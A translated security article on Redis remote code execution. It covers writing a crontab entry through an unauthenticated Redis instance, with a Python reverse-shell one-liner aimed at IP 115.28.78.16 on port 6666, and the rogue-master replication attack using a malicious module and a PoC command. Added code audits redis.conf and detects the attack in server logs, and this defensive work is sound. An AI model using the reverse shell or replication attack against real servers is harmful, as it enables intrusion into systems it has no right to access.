Title: Redis RCE utilization based on master-slave replication

Redis RCE Exploitation Based on Master-Slave Replication

At the WCTF2019 Final, which ended on July 7, 2019, Pavel Toporkov of LC/BC presented a new Redis RCE technique during the sharing session. It is more general and more damaging than the earlier technique. Let's start from that earlier technique and walk through the Redis exploitation issues.

https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf

GetShell by writing files

An unauthenticated Redis instance can be used to get a shell, as follows:

    127.0.0.1:6379> config set dir /var/spool/cron/crontabs
    OK
    127.0.0.1:6379> config set dbfilename root
    OK
    127.0.0.1:6379> get 1
    '\n* * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'IP\',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);'\n'
    127.0.0.1:6379> save
    OK

This method gets a shell by writing a file. Its main problem is that the data Redis saves is not plain JSON or CSV, so the written file contains a large amount of useless data, similar to:

    [padding]
    * * * * * /usr/bin/python -c 'import socket,subprocess,os,sys;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'115.28.78.16\',6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);'
    [padding]

This technique relies on the fact that files such as crontab, ssh keys and webshells have a certain tolerance for such garbage. In addition, crontab and ssh can be considered standard services on a server, so in the past this file-writing method of getting a shell worked almost everywhere.

However, as modern deployment practices keep evolving, componentization has become an unavoidable trend, and Docker is one of its products. In this deployment model a single container runs no services other than Redis, so there is neither ssh nor crontab. Combined with strict permission control, it is hard to get a shell just by writing files. In that case we need other means of exploitation.
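The file write above works only because CONFIG SET dir/dbfilename and SAVE are reachable by an unauthenticated client. The following audit is an added example, not code from the original post: it parses redis.conf text and reports the settings that leave that path open, and it also covers the SLAVEOF/REPLICAOF and MODULE commands used in the replication-based technique later on this page. The config fragments are constructed sample data and the helper names are hypothetical.

```python
# Constructed redis.conf fragments (sample data, not from the page). The weak
# one leaves CONFIG SET dir/dbfilename + SAVE open to any unauthenticated
# client; the hardened one closes that path. Helper names are hypothetical.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
dir /var/lib/redis
dbfilename dump.rdb
"""
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass REPLACE_WITH_A_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command SLAVEOF ""
rename-command REPLICAOF ""
rename-command MODULE ""
rename-command DEBUG ""
"""
# Commands the techniques on this page depend on (CONFIG, SLAVEOF/REPLICAOF, MODULE).
DANGEROUS = ("CONFIG", "SLAVEOF", "REPLICAOF", "MODULE", "DEBUG")

def parse_conf(text):
    """Return (settings dict, set of renamed commands) from redis.conf text."""
    settings, renamed = {}, set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "rename-command":
            renamed.add(value.split()[0].upper())  # renamed or disabled ("")
        else:
            settings[key.lower()] = value.strip()
    return settings, renamed

def audit(text):
    """List the weak settings found; an empty list means all checks passed."""
    s, renamed = parse_conf(text)
    findings = []
    bind = s.get("bind", "").split()   # no bind directive means all interfaces
    if not bind or any(b in ("0.0.0.0", "::", "*") for b in bind):
        findings.append("bind: listening on non-loopback interfaces")
    if s.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode: disabled")
    if not s.get("requirepass"):
        findings.append("requirepass: unset, clients are unauthenticated")
    findings += [f"{c}: command not renamed or disabled" for c in DANGEROUS if c not in renamed]
    return findings
```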

GetShell via master-slave replication

Redis master-slave replication

Redis is an open-source, networked, in-memory key-value store with optional persistence, written in ANSI C. If all data lives in a single Redis instance, the server struggles once the read and write volume becomes large. To cope with this, Redis provides a master-slave mode: one Redis instance acts as the master and the other instances act as backups. The master and the slaves hold the same data, while the slaves only serve reads and the master only handles writes. This read/write separation greatly reduces traffic pressure; it is a way of trading space for efficiency.

Use two Docker containers for the test:

    docker search redis5
    docker pull damonevking/redis5.0
    docker ps

The master-slave relationship is set with slaveof. First set it on the slave, then on the master; afterwards you can see on the slave that the data has been synchronized (the original post shows these steps as screenshots).

Redis modules

After understanding master-slave synchronization, we also need some understanding of Redis modules.

Since Redis 4.x, Redis supports modules: new Redis commands can be added through external extensions, written in C and compiled into .so files.

Code for building a malicious .so file:

https://github.com/RicterZ/RedisModules-ExecuteCommand

After git clone, enter the directory and run make to compile it and obtain the .so library file.

Exploitation principle

When two Redis instances are in master-slave mode, the master can push a file to the slave through FULLRESYNC. Loading that .so file on the slave then lets us execute the newly added command.

Reproduction

Use a simulated malicious server as the master that fakes the FULLRESYNC response.

https://github.com/LoRexxar/redis-rogue-server

(Note: the author ran it successfully in a Python 3.7 environment.)

Then start the Redis 5.0 Docker container.

Then attack the server directly with the PoC:

    python3 redis-rogue-server.py --rhost 172.18.0.2 --rport 6379 --lhost 172.18.0.1

(Note: the reverse shell has problems in the Docker environment, so lhost in this article uses the internal IP of the Docker host; the author got an error when using the external IP.)
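The rogue-master chain leaves a recognisable trace in the slave's own server log: a client-requested REPLICAOF/SLAVEOF, a full resync, and then a module loaded at runtime. The detector below is an added example, not code from the original post or from redis-rogue-server: it correlates those events over a constructed Redis 5 log excerpt and raises a high-severity alert when a module load follows replication within a short window. The message formats are assumed from Redis 5 notice-level output and should be checked against your own redis-server logs.

```python
import re
from datetime import datetime

# Constructed Redis 5 log excerpt (sample data, not from the page); the message
# texts are assumed from Redis 5 notice-level lines, verify against real output.
SAMPLE_LOG = """\
1:M 24 Jul 2019 08:35:04.112 * REPLICAOF 172.18.0.1:6379 enabled (user request from 'addr=172.18.0.1:51234 cmd=slaveof')
1:S 24 Jul 2019 08:35:05.001 * Connecting to MASTER 172.18.0.1:6379
1:S 24 Jul 2019 08:35:05.002 * MASTER <-> REPLICA sync started
1:S 24 Jul 2019 08:35:05.010 * Full resync from master: REPLID_PLACEHOLDER:1
1:S 24 Jul 2019 08:35:05.020 * MASTER <-> REPLICA sync: receiving 48888 bytes from master
1:S 24 Jul 2019 08:35:05.031 * Module 'system' loaded from /data/exp.so
"""

TS = re.compile(r"^\d+:[MSC] (\d{2} \w{3} \d{4} \d{2}:\d{2}:\d{2})\.(\d{3})")
REPLICAOF = re.compile(r"(?:REPLICAOF|SLAVE OF) (\S+):(\d+) enabled \(user request")
MODULE = re.compile(r"Module '([^']+)' loaded from (\S+)")

def parse_ts(line):
    """Timestamp of a redis-server log line, or None if the prefix is absent."""
    m = TS.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%d %b %Y %H:%M:%S")
    return ts.replace(microsecond=int(m.group(2)) * 1000)

def detect(log_text, allowed_masters=frozenset(), window_s=60):
    """Return (severity, message) alerts for the rogue-master chain:
    a client-requested REPLICAOF followed shortly by a module load."""
    alerts, last_replicaof = [], None
    for line in log_text.splitlines():
        ts = parse_ts(line)
        if ts is None:
            continue
        m = REPLICAOF.search(line)
        if m:
            master = f"{m.group(1)}:{m.group(2)}"
            last_replicaof = (ts, master)
            if master not in allowed_masters:
                alerts.append(("medium", f"replication enabled toward unapproved master {master}"))
            continue
        m = MODULE.search(line)
        if m:
            name, path = m.groups()
            if last_replicaof and (ts - last_replicaof[0]).total_seconds() <= window_s:
                alerts.append(("high", f"module '{name}' loaded from {path} within {window_s}s of replication from {last_replicaof[1]}"))
            else:
                alerts.append(("medium", f"runtime module load: '{name}' from {path}"))
    return alerts
```

A runtime module load on a production instance is rare enough to be worth an alert on its own; the replication correlation only raises the severity.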
